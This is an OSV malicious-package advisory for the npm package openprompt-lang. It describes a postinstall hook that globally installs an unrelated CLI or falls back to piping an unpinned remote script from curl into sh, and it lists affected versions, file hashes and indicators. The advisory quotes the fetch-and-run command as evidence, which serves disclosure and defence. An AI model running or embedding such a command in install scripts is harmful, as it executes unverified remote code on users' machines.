MAL-2026-4630

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4630
Published
2026-05-23T23:03:36Z
Modified
2026-06-12T20:01:55.529900539Z
Summary
Malicious code in openprompt-lang (npm)
Details


Source: amazon-inspector (24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2)

On every `npm install`, openprompt-lang's postinstall hook (`scripts/postinstall.js:83`) executes `npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh`. The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to `sh` with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (`@opencode/cli`), mutating the developer's global npm environment as a side effect of installing this library.


Affected packages

npm / openprompt-lang

Affected versions

1.*
1.1.0
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.2.6
1.2.7
1.3.0
1.5.0
1.6.0

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "openprompt-lang-1.3.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-AQgBNBhfzGND+x14tiAutREAWF1eSlEItVAth1S7e0RvwbRtSlMDF3Q4FYzXhtp+f7v6aaNn/w00htJUBgQm2A==",
                "sha1": "d9b5efbc402ec6a1373b98740a72573274325873"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "2515e6c5a0ee46d25c8811e35e5e2679fcbe08cfb77b27f6e82c172165c19c58",
            "path": "scripts/postinstall.js",
            "tlsh": "4eb1e07692f801343f42c0ad3d1b1012b07a79637704f9987b9ebba95fcd82885622fd"
        }
    ],
    "domains": [
        "34.9.16.104.in-addr.arpa"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]